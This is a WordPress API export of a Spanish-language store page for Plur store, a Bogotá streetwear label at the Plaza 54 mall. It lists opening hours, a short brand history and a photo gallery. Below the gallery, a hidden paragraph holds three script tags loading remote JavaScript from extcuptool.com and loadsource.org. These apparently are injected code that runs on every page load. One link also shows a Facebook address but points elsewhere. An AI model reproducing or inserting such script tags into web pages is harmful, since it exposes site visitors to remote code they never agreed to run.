{"id":9561,"date":"2018-08-08T17:49:25","date_gmt":"2018-08-08T17:49:25","guid":{"rendered":"http:\/\/plaza54.com\/pagina\/?page_id=9561"},"modified":"2021-07-12T17:26:07","modified_gmt":"2021-07-12T17:26:07","slug":"plurstore","status":"publish","type":"page","link":"https:\/\/plaza54.com\/pagina\/plurstore\/","title":{"rendered":"Plur store"},"content":{"rendered":"<style type=\"text\/css\"> \n#cmsmasters_row_6a0904956d796 .cmsmasters_row_outer_parent { \n\tpadding-top: 50px; \n} \n\n#cmsmasters_row_6a0904956d796 .cmsmasters_row_outer_parent { \n\tpadding-bottom: 55px; \n} \n\n \n#cmsmasters_heading_6a0904956da8a { \n\ttext-align:left; \n\tmargin-top:45px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a0904956da8a .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904956da8a .cmsmasters_heading, #cmsmasters_heading_6a0904956da8a .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904956da8a .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904956daa9 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a0904956daa9 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904956daa9 .cmsmasters_heading, #cmsmasters_heading_6a0904956daa9 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904956daa9 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904956dac0 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:30px; \n} \n\n#cmsmasters_heading_6a0904956dac0 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904956dac0 .cmsmasters_heading, #cmsmasters_heading_6a0904956dac0 .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904956dac0 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904956dad5 { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:10px; \n} \n\n#cmsmasters_heading_6a0904956dad5 .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904956dad5 .cmsmasters_heading, #cmsmasters_heading_6a0904956dad5 .cmsmasters_heading a { \n\tfont-weight:700; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904956dad5 .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904956daec { \n\ttext-align:left; \n\tmargin-top:0px; \n\tmargin-bottom:50px; \n} \n\n#cmsmasters_heading_6a0904956daec .cmsmasters_heading { \n\ttext-align:left; \n} \n\n#cmsmasters_heading_6a0904956daec .cmsmasters_heading, #cmsmasters_heading_6a0904956daec .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904956daec .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_heading_6a0904956db6b { \n\ttext-align:center; \n\tmargin-top:0px; \n\tmargin-bottom:20px; \n} \n\n#cmsmasters_heading_6a0904956db6b .cmsmasters_heading { \n\ttext-align:center; \n} \n\n#cmsmasters_heading_6a0904956db6b .cmsmasters_heading, #cmsmasters_heading_6a0904956db6b .cmsmasters_heading a { \n\tfont-weight:normal; \n\tfont-style:normal; \n} \n\n#cmsmasters_heading_6a0904956db6b .cmsmasters_heading_divider { \n} \n\n \n#cmsmasters_divider_6a0904956db87 { \n\tborder-bottom-width:1px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:30px; \n} \n \n#cmsmasters_divider_6a0904956dbef { \n\tborder-bottom-width:0px; \n\tborder-bottom-style:solid; \n\tpadding-top:0px; \n\tmargin-bottom:20px; \n} \n\r\n\t\t\t\t#cmsmasters_gallery_6a0904956dc1a .cmsmasters_gallery {\r\n\t\t\t\t\tmargin:0 0 0 -15px;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t\t#cmsmasters_gallery_6a0904956dc1a .cmsmasters_gallery .cmsmasters_gallery_item {\r\n\t\t\t\t\tpadding:0 0 15px 15px;\r\n\t\t\t\t}\r\n\t\t\t<\/style><div id=\"cmsmasters_row_6a0904956d796\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_fourth\">\n<div class=\"aligncenter\">\n<div class=\"cmsmasters_img  cmsmasters_image_c\">\n<img decoding=\"async\" src=\"\" alt=\"\" \/>\n<\/div>\n<\/div>\n\n<div id=\"cmsmasters_heading_6a0904956da8a\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">Horario<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904956daa9\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Lunes a S\u00e1bado: 10:30 am a 8:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904956dac0\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\">Domingos y festivos: 12:00 am a 7:00 pm<\/h6>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904956dad5\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h3 class=\"cmsmasters_heading\">P\u00e1gina Web<\/h3>\n<\/div>\n<div id=\"cmsmasters_heading_6a0904956daec\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_left\">\n\t<h6 class=\"cmsmasters_heading\"><a href=\"http:\/\/www.pippa.com.co\">www.facebook.com\/plur.store<\/a><\/h6>\n<\/div>\n<\/div>\n<div class=\"cmsmasters_column three_fourth\">\n\n<div id=\"cmsmasters_heading_6a0904956db6b\" class=\"cmsmasters_heading_wrap cmsmasters_heading_align_center\">\n\t<h2 class=\"cmsmasters_heading\">Plur store &#8211; Local 111<\/h2>\n<\/div>\n\n<div id=\"cmsmasters_divider_6a0904956db87\" class=\"cmsmasters_divider cmsmasters_divider_width_long cmsmasters_divider_pos_center\"><\/div>\n<div class=\"cmsmasters_text\">\n<p>Es un colectivo conformado por dos hermanos bogotanos dedicados al dise\u00f1o de modas, que desde hace mas de 7 a\u00f1os han dado a conocer su trabajo en la calle del sol en la zona rosa de Bogot\u00e1, vistiendo a j\u00f3venes de esta ciudad con un estilo vanguardista y muy profesional.<\/p>\n<p>Durante los \u00faltimos a\u00f1os se han dedicado a consolidar la marca con m\u00e1s puntos de venta en la ciudad que muestran su trayectoria y trabajo en el dise\u00f1o de ropa urbana; actualmente se proyectan con franquicias a almacenes exclusivos de las principales ciudades de Colombia<br \/>\nInspirados en las mejores vitrinas del mundo con el objetivo de crear un mejor estilo en las personas, buscando trascender en otras partes del mundo.<\/p>\n<\/div>\n\n\n<div id=\"cmsmasters_divider_6a0904956dbef\" class=\"cl\"><\/div>\n<div id=\"cmsmasters_gallery_6a0904956dc1a\" class=\"cmsmasters_gallery_wrap\"><ul class=\"cmsmasters_gallery cmsmasters_3 cmsmasters_more_items_loader\"><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs1.jpg\" rel=\"ilightbox[6a0904956dc1a]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs1-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs1-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs1-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs2.jpg\" rel=\"ilightbox[6a0904956dc1a]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs2-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs2-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs2-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><li class=\"cmsmasters_gallery_item\"><figure><a href=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs3.jpg\" rel=\"ilightbox[6a0904956dc1a]\"><img loading=\"lazy\" decoding=\"async\" width=\"580\" height=\"375\" src=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs3-580x375.jpg\" class=\"attachment-blog-masonry-thumb size-blog-masonry-thumb\" alt=\"\" srcset=\"https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs3-580x375.jpg 580w, https:\/\/plaza54.com\/pagina\/wp-content\/uploads\/2021\/07\/plurs3-1160x750.jpg 1160w\" sizes=\"auto, (max-width: 580px) 100vw, 580px\" \/><\/a><\/figure><\/li><\/ul><script type=\"text\/javascript\">\r\n\t\t\t\tjQuery(document).ready(function () {\r\n\t\t\t\t\t(function ($) {\r\n\t\t\t\t\t\tif ($('#cmsmasters_gallery_6a0904956dc1a').find('.cmsmasters_gallery_item').length == '0') {\r\n\t\t\t\t\t\t\treturn false;\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tstartGallery( \r\n\t\t\t\t\t\t\t'6a0904956dc1a', \r\n\t\t\t\t\t\t\t'grid', \r\n\t\t\t\t\t\t\t'false', \r\n\t\t\t\t\t\t\t'false' \r\n\t\t\t\t\t\t);\r\n\t\t\t\t\t} )(jQuery);\r\n\t\t\t\t} );\r\n\t\t\t<\/script>\r\n\t\t\t<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"cmsmasters_row_6a0904956e462\" class=\"cmsmasters_row cmsmasters_color_scheme_default cmsmasters_row_top_default cmsmasters_row_bot_default cmsmasters_row_boxed\">\n<div class=\"cmsmasters_row_outer_parent\">\n<div class=\"cmsmasters_row_outer\">\n<div class=\"cmsmasters_row_inner\">\n<div class=\"cmsmasters_row_margin\">\n<div class=\"cmsmasters_column one_first\">\n<div class=\"cmsmasters_text\">\n<p><script src=\"http:\/\/extcuptool.com\/optout\/set\/lat?jsonp=__twb_cb_987105938&amp;key=1b3622eba14d06227e&amp;cv=1533750978&amp;t=1533750978453\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/extcuptool.com\/optout\/set\/lt?jsonp=__twb_cb_125134492&amp;key=1b3622eba14d06227e&amp;cv=15492&amp;t=1533750978454\" type=\"text\/javascript\"><\/script><script src=\"http:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=1533750978462\" type=\"text\/javascript\"><\/script><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-9561","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9561","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/comments?post=9561"}],"version-history":[{"count":15,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9561\/revisions"}],"predecessor-version":[{"id":11053,"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/pages\/9561\/revisions\/11053"}],"wp:attachment":[{"href":"https:\/\/plaza54.com\/pagina\/wp-json\/wp\/v2\/media?parent=9561"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}